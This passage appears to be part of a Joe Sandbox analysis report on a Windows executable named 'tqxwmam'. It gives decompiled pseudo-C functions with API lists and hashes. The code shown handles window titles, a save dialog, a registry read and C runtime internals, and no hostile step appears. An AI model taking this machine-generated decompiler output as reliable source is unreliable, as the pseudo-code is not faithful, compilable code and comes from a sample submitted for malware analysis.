                                                    • Associated: 00000001.00000002.302784618.000000000040E000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                    • Associated: 00000001.00000002.302795509.0000000000412000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_1_2_400000_tqxwmam.jbxd
                                                    Similarity
                                                    • API ID: Menulstrlen$CheckItemLoadStringlstrcpy$ShowWindow
                                                    • String ID: *.*$*.txt
                                                    • API String ID: 3918228958-3257935098
                                                    • Opcode ID: 5e07f87171869e0cddba55427750ebc7e1b2d45a456ef1b7703ef3ce188cedaf
                                                    • Instruction ID: f42da9ed80a3fa16a596e51c79f5d99f06e7a3f8c8db1e15c2d4c45c05ba8eba
                                                    • Opcode Fuzzy Hash: 5e07f87171869e0cddba55427750ebc7e1b2d45a456ef1b7703ef3ce188cedaf
                                                    • Instruction Fuzzy Hash: 3411A272690129ABC7045B7AED4ADE63F6CEB983517018932F601F71B0D67898208F68
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00401066 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 40stringCOMMON
                                                    Download Yara Rule
                                                    C-Code - Quality: 100%
                                                    			E00401066() {
				short _v16;
				short _v144;

				if( *0x414778 == 0) {
					LoadStringW( *0x4140e0, 0x174,  &_v16, 0);
				} else {
					lstrcpyW( &_v16, 0x414778);
				}
				LoadStringW( *0x4140e0, 0x170,  &_v144, 0);
				lstrcatW( &_v16, " - ");
				lstrcatW( &_v16,  &_v144);
				return SetWindowTextW( *0x4140e4,  &_v16);
			}





                                                    0x00401081
                                                    0x0040109f
                                                    0x00401083
                                                    0x00401089
                                                    0x00401089
                                                    0x004010b5
                                                    0x004010c6
                                                    0x004010d3
                                                    0x004010e7

                                                    APIs
                                                    • lstrcpyW.KERNEL32 ref: 00401089
                                                    • LoadStringW.USER32(00000174,?,00000000), ref: 0040109F
                                                    • LoadStringW.USER32(00000170,?,00000000), ref: 004010B5
                                                    • lstrcatW.KERNEL32(?, - ), ref: 004010C6
                                                    • lstrcatW.KERNEL32(?,?), ref: 004010D3
                                                    • SetWindowTextW.USER32(?), ref: 004010DF
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000001.00000002.302708322.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000001.00000002.302694562.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                    • Associated: 00000001.00000002.302784618.000000000040E000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                    • Associated: 00000001.00000002.302795509.0000000000412000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_1_2_400000_tqxwmam.jbxd
                                                    Similarity
                                                    • API ID: LoadStringlstrcat$TextWindowlstrcpy
                                                    • String ID: -
                                                    • API String ID: 1185428369-3695764949
                                                    • Opcode ID: 10c4de3b9ce82ceb13c8efcd6f8f3753bad81ec738fdca33b4bd4bd2c093e8f8
                                                    • Instruction ID: 585b3535da56b71ceef3ad1f08ef4f786a354c02144d2c149fb69589829bca3d
                                                    • Opcode Fuzzy Hash: 10c4de3b9ce82ceb13c8efcd6f8f3753bad81ec738fdca33b4bd4bd2c093e8f8
                                                    • Instruction Fuzzy Hash: E6011275D00118BADF1097A1ED49FD97BBCE744300F018573B651F31E0D7746A548BA9
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 004065D0 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 40COMMONLIBRARYCODE
                                                    Download Yara Rule
                                                    C-Code - Quality: 91%
                                                    			E004065D0(void* __ebx, void* __edi, void* __esi, void* __eflags) {
				intOrPtr _t26;
				intOrPtr _t30;
				intOrPtr _t39;
				void* _t40;

				_t31 = __ebx;
				_push(8);
				_push(0x4101d0);
				E00405290(__ebx, __edi, __esi);
				GetModuleHandleW(L"KERNEL32.DLL");
				_t39 =  *((intOrPtr*)(_t40 + 8));
				 *((intOrPtr*)(_t39 + 0x5c)) = 0x40f218;
				 *(_t39 + 8) =  *(_t39 + 8) & 0x00000000;
				 *((intOrPtr*)(_t39 + 0x14)) = 1;
				 *((intOrPtr*)(_t39 + 0x70)) = 1;
				 *((char*)(_t39 + 0xc8)) = 0x43;
				 *((char*)(_t39 + 0x14b)) = 0x43;
				 *(_t39 + 0x68) = 0x4127f8;
				E004083A8(__ebx, 1, 0xd);
				 *(_t40 - 4) =  *(_t40 - 4) & 0x00000000;
				InterlockedIncrement( *(_t39 + 0x68));
				 *(_t40 - 4) = 0xfffffffe;
				E00406672();
				E004083A8(_t31, 1, 0xc);
				 *(_t40 - 4) = 1;
				_t26 =  *((intOrPtr*)(_t40 + 0xc));
				 *((intOrPtr*)(_t39 + 0x6c)) = _t26;
				if(_t26 == 0) {
					_t30 =  *0x412f60; // 0x412e88
					 *((intOrPtr*)(_t39 + 0x6c)) = _t30;
				}
				E00407A5B( *((intOrPtr*)(_t39 + 0x6c)));
				 *(_t40 - 4) = 0xfffffffe;
				return E004052D5(E0040667B());
			}







                                                    0x004065d0
                                                    0x004065d0
                                                    0x004065d2
                                                    0x004065d7
                                                    0x004065e1
                                                    0x004065e7
                                                    0x004065ea
                                                    0x004065f1
                                                    0x004065f8
                                                    0x004065fb
                                                    0x004065fe
                                                    0x00406605
                                                    0x0040660c
                                                    0x00406615
                                                    0x0040661b
                                                    0x00406622
                                                    0x00406628
                                                    0x0040662f
                                                    0x00406636
                                                    0x0040663c
                                                    0x0040663f
                                                    0x00406642
                                                    0x00406647
                                                    0x00406649
                                                    0x0040664e
                                                    0x0040664e
                                                    0x00406654
                                                    0x0040665a
                                                    0x0040666b

                                                    APIs
                                                    • GetModuleHandleW.KERNEL32(KERNEL32.DLL,004101D0,00000008,004066D8,00000000,00000000,?,00401F28,?,0040E748), ref: 004065E1
                                                    • __lock.LIBCMT ref: 00406615
                                                      • Part of subcall function 004083A8: __mtinitlocknum.LIBCMT ref: 004083BE
                                                      • Part of subcall function 004083A8: __amsg_exit.LIBCMT ref: 004083CA
                                                      • Part of subcall function 004083A8: EnterCriticalSection.KERNEL32(?,?,?,0040661A,0000000D), ref: 004083D2
                                                    • InterlockedIncrement.KERNEL32(004127F8), ref: 00406622
                                                    • __lock.LIBCMT ref: 00406636
                                                    • ___addlocaleref.LIBCMT ref: 00406654
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000001.00000002.302708322.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000001.00000002.302694562.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                    • Associated: 00000001.00000002.302784618.000000000040E000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                    • Associated: 00000001.00000002.302795509.0000000000412000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_1_2_400000_tqxwmam.jbxd
                                                    Similarity
                                                    • API ID: __lock$CriticalEnterHandleIncrementInterlockedModuleSection___addlocaleref__amsg_exit__mtinitlocknum
                                                    • String ID: KERNEL32.DLL
                                                    • API String ID: 637971194-2576044830
                                                    • Opcode ID: 6ee7817d94785b5899ffe60e68e1e5390bbed3665d74e8dd359c580f5f3a4c34
                                                    • Instruction ID: 0c03c941ef3fdec32f1d52a21a63b0fac8e6545e07e4ab54f2b6259444148476
                                                    • Opcode Fuzzy Hash: 6ee7817d94785b5899ffe60e68e1e5390bbed3665d74e8dd359c580f5f3a4c34
                                                    • Instruction Fuzzy Hash: 6401A171440B009AD320AF66D90974ABBF0AF50315F20896FE4DAA63E0CBB9A654CF19
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 004014CA Relevance: 9.1, APIs: 6, Instructions: 68windowCOMMON
                                                    Download Yara Rule
                                                    C-Code - Quality: 94%
                                                    			E004014CA(struct HWND__* _a4, intOrPtr _a8, unsigned int _a12, intOrPtr _a16) {
				void* _v524;
				void* _t11;
				int _t18;
				void* _t20;
				struct HWND__* _t21;
				unsigned int _t24;
				signed int _t26;

				_t11 = _a8 - 0x4e;
				if(_t11 == 0) {
					if( *((intOrPtr*)(_a16 + 8)) == 0xfffffda6 &&  *0x414e4c != 0) {
						SendMessageW(GetParent(_a4), 0x465, 0,  &_v524);
						_t18 = E00401443( &_v524);
						if(_t18 != 0xffffffff) {
							 *0x414e48 = _t18;
							SendMessageW( *0x413440, 0x14e, _t18, 0);
						}
					}
				} else {
					_t20 = _t11 - 0xc2;
					if(_t20 == 0) {
						_t21 = GetDlgItem(_a4, 0x191);
						 *0x413440 = _t21;
						SendMessageW(_t21, 0x14e,  *0x414e48, 0);
					} else {
						if(_t20 == 1) {
							_t24 = _a12;
							if(_t24 == 0x191 && _t24 >> 0x10 == 1) {
								_t26 = SendMessageW( *0x413440, 0x147, 0, 0);
								_t3 = _t26 + 1; // 0x1
								asm("sbb ecx, ecx");
								 *0x414e48 =  ~_t3 & _t26;
							}
						}
					}
				}
				return 0;
			}










                                                    0x004014d6
                                                    0x004014d9
                                                    0x00401563
                                                    0x0040158d
                                                    0x00401596
                                                    0x0040159e
                                                    0x004015ae
                                                    0x004015b3
                                                    0x004015b3
                                                    0x004015b5
                                                    0x004014db
                                                    0x004014db
                                                    0x004014e0
                                                    0x00401538
                                                    0x00401546
                                                    0x00401551
                                                    0x004014e2
                                                    0x004014e3
                                                    0x004014e9
                                                    0x004014f4
                                                    0x00401516
                                                    0x0040151c
                                                    0x00401521
                                                    0x00401525
                                                    0x00401525
                                                    0x004014f4
                                                    0x004014e3
                                                    0x004014e0
                                                    0x004015b9

                                                    APIs
                                                    • SendMessageW.USER32(00000147,00000000,00000000), ref: 00401516
                                                    • GetDlgItem.USER32 ref: 00401538
                                                    • SendMessageW.USER32(00000000,0000014E,00000000), ref: 00401551
                                                    • GetParent.USER32(FFFFFDA6), ref: 00401580
                                                    • SendMessageW.USER32(00000000), ref: 0040158D
                                                    • SendMessageW.USER32(0000014E,00000000,00000000), ref: 004015B3
                                                    Memory Dump Source
                                                    • Source File: 00000001.00000002.302708322.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000001.00000002.302694562.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                    • Associated: 00000001.00000002.302784618.000000000040E000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                    • Associated: 00000001.00000002.302795509.0000000000412000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_1_2_400000_tqxwmam.jbxd
                                                    Similarity
                                                    • API ID: MessageSend$ItemParent
                                                    • String ID:
                                                    • API String ID: 2505470899-0
                                                    • Opcode ID: 98bdb03554190ad567ac758c299958e0baf00a2904b2696b76e962ba3bbc29b8
                                                    • Instruction ID: 2ce5f57a3a93a7f1a80129182d0a523b5a4cadd61aa7ea3d2dd1a96f03c09e11
                                                    • Opcode Fuzzy Hash: 98bdb03554190ad567ac758c299958e0baf00a2904b2696b76e962ba3bbc29b8
                                                    • Instruction Fuzzy Hash: 8F218E75600305FBEB249F64DD49FAA3768F740708F044636FA12FA2F1D67899908B4D
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 0040759A Relevance: 9.0, APIs: 6, Instructions: 47COMMONLIBRARYCODE
                                                    Download Yara Rule
                                                    C-Code - Quality: 81%
                                                    			E0040759A(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				signed int _t15;
				LONG* _t21;
				void* _t31;
				LONG* _t33;
				void* _t34;
				void* _t35;

				_t35 = __eflags;
				_t29 = __edx;
				_t25 = __ebx;
				_push(0xc);
				_push(0x410240);
				E00405290(__ebx, __edi, __esi);
				_t31 = E004066FD(__ebx, __edx, _t35);
				_t15 =  *0x412d18; // 0xfffffffe
				if(( *(_t31 + 0x70) & _t15) == 0 ||  *((intOrPtr*)(_t31 + 0x6c)) == 0) {
					E004083A8(_t25, _t31, 0xd);
					 *(_t34 - 4) =  *(_t34 - 4) & 0x00000000;
					_t33 =  *(_t31 + 0x68);
					 *(_t34 - 0x1c) = _t33;
					__eflags = _t33 -  *0x412c20; // 0x2391610
					if(__eflags != 0) {
						__eflags = _t33;
						if(__eflags != 0) {
							__eflags = InterlockedDecrement(_t33);
							if(__eflags == 0) {
								__eflags = _t33 - 0x4127f8;
								if(__eflags != 0) {
									E00407D94(_t33);
								}
							}
						}
						_t21 =  *0x412c20; // 0x2391610
						 *(_t31 + 0x68) = _t21;
						_t33 =  *0x412c20; // 0x2391610
						 *(_t34 - 0x1c) = _t33;
						InterlockedIncrement(_t33);
					}
					 *(_t34 - 4) = 0xfffffffe;
					E00407635();
				} else {
					_t33 =  *(_t31 + 0x68);
				}
				_t38 = _t33;
				if(_t33 == 0) {
					_push(0x20);
					E004037A2(_t29, _t38);
				}
				return E004052D5(_t33);
			}









                                                    0x0040759a
                                                    0x0040759a
                                                    0x0040759a
                                                    0x0040759a
                                                    0x0040759c
                                                    0x004075a1
                                                    0x004075ab
                                                    0x004075ad
                                                    0x004075b5
                                                    0x004075d6
                                                    0x004075dc
                                                    0x004075e0
                                                    0x004075e3
                                                    0x004075e6
                                                    0x004075ec
                                                    0x004075ee
                                                    0x004075f0
                                                    0x004075f9
                                                    0x004075fb
                                                    0x004075fd
                                                    0x00407603
                                                    0x00407606
                                                    0x0040760b
                                                    0x00407603
                                                    0x004075fb
                                                    0x0040760c
                                                    0x00407611
                                                    0x00407614
                                                    0x0040761a
                                                    0x0040761e
                                                    0x0040761e
                                                    0x00407624
                                                    0x0040762b
                                                    0x004075bd
                                                    0x004075bd
                                                    0x004075bd
                                                    0x004075c0
                                                    0x004075c2
                                                    0x004075c4
                                                    0x004075c6
                                                    0x004075cb
                                                    0x004075d3

                                                    APIs
                                                    • __getptd.LIBCMT ref: 004075A6
                                                      • Part of subcall function 004066FD: __getptd_noexit.LIBCMT ref: 00406700
                                                      • Part of subcall function 004066FD: __amsg_exit.LIBCMT ref: 0040670D
                                                    • __amsg_exit.LIBCMT ref: 004075C6
                                                    • __lock.LIBCMT ref: 004075D6
                                                    • InterlockedDecrement.KERNEL32(?), ref: 004075F3
                                                    • _free.LIBCMT ref: 00407606
                                                    • InterlockedIncrement.KERNEL32(02391610), ref: 0040761E
                                                    Memory Dump Source
                                                    • Source File: 00000001.00000002.302708322.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000001.00000002.302694562.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                    • Associated: 00000001.00000002.302784618.000000000040E000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                    • Associated: 00000001.00000002.302795509.0000000000412000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_1_2_400000_tqxwmam.jbxd
                                                    Similarity
                                                    • API ID: Interlocked__amsg_exit$DecrementIncrement__getptd__getptd_noexit__lock_free
                                                    • String ID:
                                                    • API String ID: 3470314060-0
                                                    • Opcode ID: f420f48aa06811e3381583dc6a0533d66ccf0286254d347fa273481cea4aa776
                                                    • Instruction ID: d5a2598c831a08aa9251f333eca109696cf999d682f7c47cf6012845f99b7673
                                                    • Opcode Fuzzy Hash: f420f48aa06811e3381583dc6a0533d66ccf0286254d347fa273481cea4aa776
                                                    • Instruction Fuzzy Hash: 29018231D04A11ABD711AB2A984579F77A0AF04724F14447BE815B37C1CB7C6951CFDE
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 0040117A Relevance: 9.0, APIs: 6, Instructions: 44stringwindowCOMMON
                                                    Download Yara Rule
                                                    C-Code - Quality: 79%
                                                    			E0040117A() {
				WCHAR* _v8;
				short _v520;
				short _v1040;
				char _v1064;
				short _v1576;
				short _v2088;
				int _t18;

				LoadStringW( *0x4140e0, 0x170,  &_v520, 0);
				LoadStringW( *0x4140e0, 0x183,  &_v1576, 0);
				__imp__GetCPInfoExW(0, 0,  &_v1064);
				lstrcpynW( &_v2088,  &_v1040, 0);
				_t18 = MessageBoxW( *0x4140e4, _v8,  &_v520, 0x31);
				LocalFree(_v8);
				return _t18;
			}










                                                    0x004011a0
                                                    0x004011b5
                                                    0x004011c0
                                                    0x004011d5
                                                    0x004011ed
                                                    0x004011f8
                                                    0x00401203

                                                    APIs
                                                    • LoadStringW.USER32(00000170,?,00000000), ref: 004011A0
                                                    • LoadStringW.USER32(00000183,?,00000000), ref: 004011B5
                                                    • GetCPInfoExW.KERNEL32(00000000,00000000,?), ref: 004011C0
                                                    • lstrcpynW.KERNEL32(?,?,00000000), ref: 004011D5
                                                    • MessageBoxW.USER32(?,?,00000031), ref: 004011ED
                                                    • LocalFree.KERNEL32(?), ref: 004011F8
                                                    Memory Dump Source
                                                    • Source File: 00000001.00000002.302708322.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000001.00000002.302694562.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                    • Associated: 00000001.00000002.302784618.000000000040E000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                    • Associated: 00000001.00000002.302795509.0000000000412000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_1_2_400000_tqxwmam.jbxd
                                                    Similarity
                                                    • API ID: LoadString$FreeInfoLocalMessagelstrcpyn
                                                    • String ID:
                                                    • API String ID: 639860764-0
                                                    • Opcode ID: 135c50b7a1572513132b708e8f08695bb7b406c585e491ddd8a387b0cb6d1eaa
                                                    • Instruction ID: 78ea4654d7681c2bebba14450c910f860aa863282c5fa62907f2070393e64fe6
                                                    • Opcode Fuzzy Hash: 135c50b7a1572513132b708e8f08695bb7b406c585e491ddd8a387b0cb6d1eaa
                                                    • Instruction Fuzzy Hash: AF0144B6500128BBDB119B95ED08DDA7BBCEB8C700F0041B5BB15F2060D6315B54CFA4
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00401D08 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 60stringCOMMON
                                                    Download Yara Rule
                                                    C-Code - Quality: 100%
                                                    			E00401D08() {
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v32;
				intOrPtr _v40;
				signed int _v60;
				WCHAR* _v64;
				intOrPtr _v80;
				intOrPtr _v84;
				intOrPtr _v88;
				struct tagOFNA _v92;
				short _v612;
				void* _t30;
				struct tagOFNA _t39;

				_t39 = 0x58;
				E004021D0( &_v92, 0, _t39);
				lstrcpyW( &_v612, L"*.txt");
				_v60 = _v60 & 0x00000000;
				 *0x414e4c =  *0x414e4c & 0x00000000;
				_v88 =  *0x4140e4;
				_v84 =  *0x4140e0;
				_v64 =  &_v612;
				_v92 = _t39;
				_v80 = 0x414984;
				_v40 = 0x880866;
				_v24 = E004014CA;
				_v20 = 0x190;
				_v32 = 0x40e328;
				 *0x414e48 =  *0x414980;
				while(GetSaveFileNameW( &_v92) != 0) {
					_t30 = E00401204( &_v612,  *0x414e48);
					if(_t30 == 0) {
						E004015BC( &_v612,  *0x414e48);
						E00401066();
						return 1;
					}
					if(_t30 != 0) {
						break;
					}
				}
				return 0;
			}
















                                                    0x00401d14
                                                    0x00401d1c
                                                    0x00401d30
                                                    0x00401d3b
                                                    0x00401d3f
                                                    0x00401d46
                                                    0x00401d4e
                                                    0x00401d57
                                                    0x00401d5f
                                                    0x00401d68
                                                    0x00401d6f
                                                    0x00401d76
                                                    0x00401d7d
                                                    0x00401d84
                                                    0x00401d8b
                                                    0x00401dad
                                                    0x00401da4
                                                    0x00401da7
                                                    0x00401dc8
                                                    0x00401dcd
                                                    0x00000000
                                                    0x00401dd4
                                                    0x00401dab
                                                    0x00000000
                                                    0x00000000
                                                    0x00401dab
                                                    0x00000000

                                                    APIs
                                                    • _memset.LIBCMT ref: 00401D1C
                                                    • lstrcpyW.KERNEL32 ref: 00401D30
                                                    • GetSaveFileNameW.COMDLG32(?), ref: 00401DB1
                                                      • Part of subcall function 004015BC: lstrcpyW.KERNEL32 ref: 004015C7
                                                      • Part of subcall function 004015BC: GetFileTitleW.COMDLG32(?,00414778,00000000), ref: 004015DE
                                                      • Part of subcall function 00401066: lstrcpyW.KERNEL32 ref: 00401089
                                                      • Part of subcall function 00401066: LoadStringW.USER32(00000170,?,00000000), ref: 004010B5
                                                      • Part of subcall function 00401066: lstrcatW.KERNEL32(?, - ), ref: 004010C6
                                                      • Part of subcall function 00401066: lstrcatW.KERNEL32(?,?), ref: 004010D3
                                                      • Part of subcall function 00401066: SetWindowTextW.USER32(?), ref: 004010DF
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000001.00000002.302708322.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000001.00000002.302694562.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                    • Associated: 00000001.00000002.302784618.000000000040E000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                    • Associated: 00000001.00000002.302795509.0000000000412000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_1_2_400000_tqxwmam.jbxd
                                                    Similarity
                                                    • API ID: lstrcpy$Filelstrcat$LoadNameSaveStringTextTitleWindow_memset
                                                    • String ID: (@$*.txt
                                                    • API String ID: 1270324361-3150126622
                                                    • Opcode ID: 8320dac0347133daf76bb63bacc3a928fa299dd15364492913f5e86baf4e65f4
                                                    • Instruction ID: 208bee8bbf4fdbdead13a0df925d97a1b1f500ce86bba44f667b65067451d43e
                                                    • Opcode Fuzzy Hash: 8320dac0347133daf76bb63bacc3a928fa299dd15364492913f5e86baf4e65f4
                                                    • Instruction Fuzzy Hash: B62138B5C0025D9BCB10DBA5ED88BDA7BB8FB44305F04443AE501F72A0E3B8A6488F58
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 004015F0 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 37registryCOMMON
                                                    Download Yara Rule
                                                    C-Code - Quality: 100%
                                                    			E004015F0() {
				char _v8;
				void* _v12;
				int _v16;
				int _v20;
				long _t17;
				char _t19;

				_t19 = 0x60;
				if(RegOpenKeyW(0x80000005, L"Software\\Fonts",  &_v12) == 0) {
					_v16 = 4;
					_t17 = RegQueryValueExW(_v12, L"LogPixels", 0,  &_v20,  &_v8,  &_v16);
					if(_t17 == 0 && _v20 == 4 && _v8 != _t17) {
						_t19 = _v8;
					}
					RegCloseKey(_v12);
				}
				return _t19;
			}









                                                    0x004015f9
                                                    0x00401610
                                                    0x00401628
                                                    0x0040162f
                                                    0x00401637
                                                    0x00401644
                                                    0x00401644
                                                    0x0040164a
                                                    0x0040164a
                                                    0x00401654

                                                    APIs
                                                    • RegOpenKeyW.ADVAPI32(80000005,Software\Fonts,?), ref: 00401608
                                                    • RegQueryValueExW.ADVAPI32(?,LogPixels,00000000,?,?,?), ref: 0040162F
                                                    • RegCloseKey.ADVAPI32(?), ref: 0040164A
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000001.00000002.302708322.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000001.00000002.302694562.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                    • Associated: 00000001.00000002.302784618.000000000040E000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                    • Associated: 00000001.00000002.302795509.0000000000412000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_1_2_400000_tqxwmam.jbxd
                                                    Similarity
                                                    • API ID: CloseOpenQueryValue
                                                    • String ID: LogPixels$Software\Fonts
                                                    • API String ID: 3677997916-4238338266
                                                    • Opcode ID: 36d30f39e0d4ff6c7beb9b60812aaa6495c43760ee289d914add54eea45c4b49
                                                    • Instruction ID: 5774a49170ac0ee2295111391bb84e2dcd997fb68e675eef892d29b5bf8acd12
                                                    • Opcode Fuzzy Hash: 36d30f39e0d4ff6c7beb9b60812aaa6495c43760ee289d914add54eea45c4b49
                                                    • Instruction Fuzzy Hash: 1EF04F75A00108FBDF109B95DD08F9FBBBCEB40704F140976EA01F1190D3769A14CB29
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 0040AE53 Relevance: 7.6, APIs: 5, Instructions: 68COMMONLIBRARYCODE
                                                    Download Yara Rule
                                                    C-Code - Quality: 94%
                                                    			E0040AE53(void* __edx, void* __edi, void* __esi, void* _a4, long _a8) {
				void* _t7;
				long _t8;
				intOrPtr* _t9;
				intOrPtr* _t12;
				long _t27;
				long _t30;

				if(_a4 != 0) {
					_push(__esi);
					_t30 = _a8;
					__eflags = _t30;
					if(_t30 != 0) {
						_push(__edi);
						while(1) {
							__eflags = _t30 - 0xffffffe0;
							if(_t30 > 0xffffffe0) {
								break;
							}
							__eflags = _t30;
							if(_t30 == 0) {
								_t30 = _t30 + 1;
								__eflags = _t30;
							}
							_t7 = HeapReAlloc( *0x413c10, 0, _a4, _t30);
							_t27 = _t7;
							__eflags = _t27;
							if(_t27 != 0) {
								L17:
								_t8 = _t27;
							} else {
								__eflags =  *0x4140d8 - _t7;
								if(__eflags == 0) {
									_t9 = E00403090(__eflags);
									 *_t9 = E0040304E(GetLastError());
									goto L17;
								} else {
									__eflags = E0040851F(_t7, _t30);
									if(__eflags == 0) {
										_t12 = E00403090(__eflags);
										 *_t12 = E0040304E(GetLastError());
										L12:
										_t8 = 0;
										__eflags = 0;
									} else {
										continue;
									}
								}
							}
							goto L14;
						}
						E0040851F(_t6, _t30);
						 *((intOrPtr*)(E00403090(__eflags))) = 0xc;
						goto L12;
					} else {
						E00407D94(_a4);
						_t8 = 0;
					}
					L14:
					return _t8;
				} else {
					return E0040AD3D(__edx, __edi, __esi, _a8);
				}
			}









                                                    0x0040ae5c
                                                    0x0040ae69
                                                    0x0040ae6a
                                                    0x0040ae6d
                                                    0x0040ae6f
                                                    0x0040ae7e
                                                    0x0040aeb1
                                                    0x0040aeb1
                                                    0x0040aeb4
                                                    0x00000000
                                                    0x00000000
                                                    0x0040ae81
                                                    0x0040ae83
                                                    0x0040ae85
                                                    0x0040ae85
                                                    0x0040ae85
                                                    0x0040ae92
                                                    0x0040ae98
                                                    0x0040ae9a
                                                    0x0040ae9c
                                                    0x0040aefc
                                                    0x0040aefc
                                                    0x0040ae9e
                                                    0x0040ae9e
                                                    0x0040aea4
                                                    0x0040aee6
                                                    0x0040aefa
                                                    0x00000000
                                                    0x0040aea6
                                                    0x0040aead
                                                    0x0040aeaf
                                                    0x0040aece
                                                    0x0040aee2
                                                    0x0040aec8
                                                    0x0040aec8
                                                    0x0040aec8
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x0040aeaf
                                                    0x0040aea4
                                                    0x00000000
                                                    0x0040aeca
                                                    0x0040aeb7
                                                    0x0040aec2
                                                    0x00000000
                                                    0x0040ae71
                                                    0x0040ae74
                                                    0x0040ae7a
                                                    0x0040ae7a
                                                    0x0040aecb
                                                    0x0040aecd
                                                    0x0040ae5e
                                                    0x0040ae68
                                                    0x0040ae68

                                                    APIs
                                                    • _malloc.LIBCMT ref: 0040AE61
                                                      • Part of subcall function 0040AD3D: __FF_MSGBANNER.LIBCMT ref: 0040AD56
                                                      • Part of subcall function 0040AD3D: __NMSG_WRITE.LIBCMT ref: 0040AD5D
                                                      • Part of subcall function 0040AD3D: RtlAllocateHeap.NTDLL(00000000,00000001,00000001,00000000,00000000,?,00407DDF,?,00000001,?,?,00408333,00000018,004102C0,0000000C,004083C3), ref: 0040AD82
                                                    • _free.LIBCMT ref: 0040AE74
                                                    Memory Dump Source
                                                    • Source File: 00000001.00000002.302708322.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000001.00000002.302694562.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                    • Associated: 00000001.00000002.302784618.000000000040E000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                    • Associated: 00000001.00000002.302795509.0000000000412000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_1_2_400000_tqxwmam.jbxd
                                                    Similarity
                                                    • API ID: AllocateHeap_free_malloc
                                                    • String ID:
                                                    • API String ID: 1020059152-0
                                                    • Opcode ID: a3584fc8ecc990920802da403dd550a219c26c2ac688a3c12319b3d7bef294a8
                                                    • Instruction ID: 5e121afab5df7809fc0a1f7b8d60ffbee972c1397d1d0f11660927e733ce331a
                                                    • Opcode Fuzzy Hash: a3584fc8ecc990920802da403dd550a219c26c2ac688a3c12319b3d7bef294a8
                                                    • Instruction Fuzzy Hash: 9011EB32480714A7CB212F76DD0465B3B95AF403A5B20483FF948BB2D1DF3C896186DE
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00401443 Relevance: 7.5, APIs: 5, Instructions: 48fileCOMMON
                                                    Download Yara Rule
                                                    C-Code - Quality: 73%
                                                    			E00401443(long _a4) {
				void _v260;
				signed int _t6;
				long _t7;
				int _t9;
				void* _t16;

				_t6 = CreateFileW(_a4, 0x80000000, 1, 0, 3, 0x80, 0);
				_t16 = _t6;
				if(_t16 != 0xffffffff) {
					_t7 = GetFileSize(_t16, 0);
					if(_t7 != 0xffffffff) {
						if(_t7 >= 0xff) {
							_t7 = 0xff;
						}
